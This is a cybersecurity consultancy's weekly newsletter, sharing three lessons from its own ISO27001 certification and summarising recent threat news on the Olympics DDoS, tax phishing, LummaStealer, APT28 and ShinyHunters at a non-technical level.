#NSBCS.111 - 3 lessons from achieving ISO27001 ourselves
3 lessons from achieving ISO27001 ourselves
After helping numerous clients achieve ISO27001 certifications over the years, NSB Cyber went through the ISO audit process late last year and achieved our Certification.
Being on the receiving end of the audit was a valuable reminder that ISO27001 is less about having the right documents, and more about how your organisation actually operates day to day. A few lessons stood out, particularly ones we see trip organisations up again and again.
1. ISO27001 is not an IT project
This is one of the most common mistakes we see. ISO27001 is a business wide management system, not a security or IT initiative. Governance, risk ownership, leadership involvement, and operational processes all matter. When certification is treated as an IT exercise, gaps tend to surface quickly once auditors start asking questions outside the tech stack.
2. Copying someone else’s ISMS rarely works
Templates can be helpful, but they are not a shortcut to certification. Controls need to reflect your organisation’s context, risk profile, and operating model. Auditors are very good at spotting shelfware, and teams struggle to follow processes that were never designed for how they actually work.
3. People are part of the control environment
Policies and tools alone are not enough. Auditors will look closely at whether people understand their roles, responsibilities, and the intent behind key controls. If your team can’t explain how something works in practice, it’s usually a sign that the control hasn’t been embedded.
Going through ISO27001 ourselves reinforced why we continue to recommend it to clients. When approached pragmatically, it becomes a genuinely useful framework for strengthening governance and cyber resilience, not just a certificate on the wall.
Looking to strengthen your Cyber Resilience? Book a meeting with our team today.
You can also explore our blog on refreshing your ISO27001 program: Cutting Through the Noise: Refreshing Your ISO 27001 Program.
What we read this week
Pro-Russian group Noname057(16) launched DDoS attacks on Milano Cortina 2026 Winter Olympics - Italian authorities have disrupted a series of Russian-linked cyberattacks targeting Foreign Ministry offices abroad, Winter Olympics–related websites, and hotels in Cortina d’Ampezzo, according to Foreign Minister Antonio Tajani. The pro-Russian hacktivist group Noname057(16) claimed responsibility for the distributed denial of service (DDoS) activity, framing it as retaliation for Italy’s support for Ukraine and listing diplomatic and hospitality targets in multiple countries. While organisers of Milano Cortina 2026 expect further attempts, the incidents to date have had limited impact due to mitigation by Italian authorities and the National Cybersecurity Agency.
Security Brief: Threat Actors Take Taxes Into Account - Proofpoint researchers have identified a surge in phishing campaigns and malicious domains impersonating tax agencies and financial organisations, aligning with seasonal tax deadlines in the United Kingdom and the United States. These lures mimic government bodies and services like Intuit, urging users to engage with fake sites for tax filing or documentation. Campaigns often use generic sender addresses with tax-themed URLs leading to credential harvesting pages. The infrastructure supports both phishing and malware delivery, with a focus on accounting and payment related entities.
LummaStealer Infections Surge After CastleLoader Malware Campaigns - Researchers have observed a renewed surge in LummaStealer (LummaC2) infections, driven by social engineering campaigns that abuse the ClickFix technique and deliver a malware loader called CastleLoader. ****Although LummaStealer’s malware-as-a-service (MaaS) infrastructure was heavily disrupted in May 2025 through coordinated law enforcement action, activity resumed by later in the year and scaled rapidly between December 2025 and January 2026, according to Bitdefender. CastleLoader acts as a central delivery mechanism, using heavily obfuscated, in-memory execution and evasion checks to deploy LummaStealer and other infostealers or remote-access tools. ClickFix campaigns typically lure users to fake verification or CAPTCHA pages that trick them into running malicious PowerShell commands, which then fetch and execute CastleLoader.
Russian Hackers Attacking European Maritime and Transport Orgs Using Microsoft Office Exploit - Researchers have identified a new wave of cyber espionage activity linked to APT28, also known as Fancy Bear, involving the rapid exploitation of a recently disclosed Microsoft Office vulnerability. Reporting indicates the campaign targeted government, diplomatic, maritime and transportation organisations across Ukraine and multiple European and Middle Eastern countries through a concentrated 72-hour spear phishing operation. The attackers delivered malicious Office documents via compromised government email accounts and once executed, the malware chain deployed tools to harvest email data and establish persistent backdoor access, while abusing legitimate cloud services to mask command-and-control traffic.
Harvard, UPenn Data Leaked in ShinyHunters Shakedown - The cyber-extortion group ShinyHunters has claimed responsibility for late-2025 breaches at Harvard University and the University of Pennsylvania, alleging the theft of more than two million records that were later posted on a dark-web leak site. Analysis by threat intelligence firm Hudson Rock suggests the Harvard data includes admissions and fundraising details that expose social and financial networks, including information on high-value donors and their families. Investigators link the activity to a broader vishing campaign in which attackers impersonate IT staff, deceive victims via fake Okta or Microsoft Entra login pages, and enroll attacker-controlled devices into MFA to gain access to identity systems and cloud applications.
Referenceshttps://securityaffairs.com/187654/hacktivism/pro-russian-group-noname05716-launched-ddos-attacks-on-milano-cortina-2026-winter-olympics.htmlhttps://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-accounthttps://www.bleepingcomputer.com/news/security/lummastealer-infections-surge-after-castleloader-malware-campaigns/https://therecord.media/russian-hackers-microsoft-office-europehttps://www.bankinfosecurity.com/harvard-upenn-data-leaked-in-shinyhunters-shakedown-a-30677